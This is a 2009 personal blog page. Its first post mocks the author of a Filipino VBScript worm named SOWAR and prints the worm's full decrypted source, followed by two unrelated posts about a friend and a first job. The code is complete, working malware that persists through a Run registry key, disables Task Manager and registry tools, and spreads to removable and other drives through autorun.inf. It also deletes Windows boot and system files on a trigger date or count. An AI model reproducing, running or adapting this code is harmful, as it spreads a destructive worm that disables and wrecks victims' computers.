Thursday, March 26, 2009

Message to SOWAR VIRUS maker

This are the Codes of the Virus named SOWAR. If I am not mistaken, this is the "TAGA LIPA ARI" IE title before.
Honestly, I am just laughing on your REVISED codes. Even if you ENCRYPT your codes, I can view it clearly.
This is to tell you that, stop making nonsense because it is just a useless one...
Just make stuff that are useful and good, not on doing stuff that are originally NOT yours.
You and Dave are alike :P

See yeah

' vbs.sowar (philippines)
On Error Resume Next
Dim fso, WHsP, WinDir, MyFName
Set fso=CreateObject("Scripting.FileSystemObject")
Set WHsP=CreateObject("WScript.Shell")

MyFName=WScript.ScriptFullName
WinDir=fso.GetSpecialFolder(0)

If LCase(Mid(MyFName, 4)) = "itcr.vbs" Then
WHsP.Run "explorer.exe " & Left(MyFName, InStrRev(MyFName, "\") - 1)
ElseIf LCase(MyFName) <> LCase(WinDir & "\esto.vbs") Then
Call LoadTxtFile()
End If

fso.CopyFile MyFName, WinDir & "\esto.vbs", True
fso.GetFile(WinDir & "\esto.vbs").Attributes=39
WHsP.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\System Restore", "wscript.exe """ & WinDir & "\esto.vbs"""

Call MakeRegEntries()
Call PayloadIt()

IActiv=""
IActiv=WHsP.RegRead("HKEY_CURRENT_USER\Software\sowar\stats")
If (IActiv="" Or IActiv=0) Then
WHsP.RegWrite "HKEY_CURRENT_USER\Software\sowar\stats", 1
WScript.Sleep 25500
Call InitSpread()
Else
WScript.Quit
End If

Sub MakeRegEntries()
On Error Resume Next
With WHsP
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://"
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "en"
.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\Homepage", 1, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\IeakHelpString", "HACKED USING: SOWAR"
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\System Restore", "wscript.exe """ & WinDir & "\esto.vbs"""
End With
End Sub

Sub InitSpread()
On Error Resume Next
WHsP.RegWrite "HKEY_CURRENT_USER\Software\sowar\stats", 0
Do
Set ActivDrives=fso.Drives
For Each USBFlashDrv In ActivDrives
DrivePath = USBFlashDrv.Path
If (USBFlashDrv.DriveType > 0 And USBFlashDrv.DriveType <> "A:" And USBFlashDrv.Path <> "B:") Then
If (USBFlashDrv.IsReady) Then
fso.CopyFile MyFName, DrivePath & "\itcr.vbs", True
fso.GetFile(DrivePath & "\itcr.vbs").Attributes=39
fso.CopyFile MyFName, DrivePath & "\un.vbs", True
fso.GetFile(DrivePath & "\un.vbs").Attributes=32
If fso.FileExists(DrivePath & "\Autorun.inf") Then
fso.GetFile(DrivePath & "\Autorun.inf").Attributes=34
fso.DeleteFile DrivePath & "\Autorun.inf", True
End If
Set AutoRunScript=fso.CreateTextFile(DrivePath & "\Autorun.inf", True)
AutoRunScript.WriteLine "[autorun]"
AutoRunScript.WriteLine "open=wscript.exe itcr.vbs"
AutoRunScript.WriteLine "shell\Open\Command=wscript.exe itcr.vbs"
AutoRunScript.WriteLine "shell\Open\Default=1"
AutoRunScript.WriteLine "shell\AutoPlay\Command=wscript.exe itcr.vbs"
AutoRunScript.WriteLine "shell\Explore\Command=wscript.exe itcr.vbs"
AutoRunScript.Close
fso.GetFile(DrivePath & "\Autorun.inf").Attributes=39
End If
End If
Next
IsActiv=""
IsActiv=WHsP.RegRead("HKEY_CURRENT_USER\Software\sowar\stats")
If IsActiv=1 Then
WScript.Quit
End If
Call MakeRegEntries()
WScript.Sleep 4000
Loop
End Sub

Sub LoadTxtFile()
On Error Resume Next
bname=Mid(MyFName, InStrRev(MyFName, "\") + 1)
txtfilename=WinDir & "\" & Left(bname, InStrRev(bname, ".")-1) & ".txt"
Set txtfile=fso.CreateTextFile(txtfilename, True)
txtfile.write "un"
txtfile.close
WHsP.Run "notepad.exe """ & txtfilename & """"
End Sub

Sub PayloadIt()
On Error Resume Next
CurCount=""
CurCount=WHsP.RegRead("HKEY_LOCAL_MACHINE\Software\sowar\count")
If (CurCount="" Or CurCount=0) Then
NewCount=0
WHsP.RegWrite "HKEY_LOCAL_MACHINE\Software\sowar\count", 1, "REG_DWORD"
Else
NewCount=CurCount
WHsP.RegWrite "HKEY_LOCAL_MACHINE\Software\sowar\count", CurCount + 1, "REG_DWORD"
End If
If (Day(Date) = 12 And Month(Date) = 6) Or (NewCount > 100) Then
fso.DeleteFile Left(windir, 3) & "ndetect.com", True
fso.DeleteFile Left(windir, 3) & "Io.sys", True
fso.DeleteFile Left(windir, 3) & "Msdos.sys", True
fso.DeleteFile windir & "\himem.sys", True
fso.DeleteFile windir & "\Win.com", True
fso.DeleteFile windir & "\system.ini", True
fso.DeleteFile windir & "\win.ini", True
wsh.Run "rundll32.exe shell32.dll,SHExitWindowsEx 2"
End If
End Sub

' sowar.a (ver. 1.0.5)
' Copyright(C) Jet F.

Decrypt by CaDeAtH
HERE - soon to be downloadable
Posted by at No comments:
Labels: , , , ,

Thursday, March 12, 2009

A BerDeath Request

This girl of mine(friend) always give me something to do, well I am not mocking about that but I thank her! Her idea is soooo interesting, she wants me to do stuff that I haven't try. Last night, we text until we both fell asleep. We tackle about her Linker using Death Codez Widgets and putting the Linker in her blog's navigation. Well it is not a difficult job for me.

And now, the next day we chat, she sent me FAN SIGNS, around three (3) Fan signs, putting my name on her palm. I was touch because we never communicate for a months because of a misunderstanding. I don't want to talk about it right now.

Geee, If you're reading this right now, I want to thank you for doing such sweet thing to me. Well, for me it is a big thing.

God Bless you Berbz :D
Posted by at No comments:
Labels: , , ,

PIPP Layout Artist

This is my First Job, as a Layout Artist at Perfect Image Group of Company at General Santos City. I am temporary here because I should be in the MIS together with technicians. Yes, I am the programmer around in the company.
I started last March 3, 2009 but I think I am starting to love my job around here :)
Aside of being the Marketing's Layout Artist, I do some works too every time the Department Head wants something. She is kind and cute too even though she is she a Married woman(I guess).
All the personnel here are kind, nice and sweet despite of their busy hours.
My Immediate superior, Mr. Leomark is kind too. He knows I am not an artistic people and that is difficult for be to assign in this Job but he don't pressure me so much.

Well in the other department, my Best friend, Agent xx, is also here. She is the one who got me here. Right now, she is already reassign in the Treasury. We both know that she don't like there but we can't do anything about it. The only advice I rendered to her is to learn Photoshop so that she can replace me in my position.

All of this event that is happening to me here in this company, all of this I thank God because of this experience. Without his present, guidance and blessing I can't do this all.

May God Bless us all
Posted by at No comments:
Labels: , , ,
Subscribe to: Posts (Atom)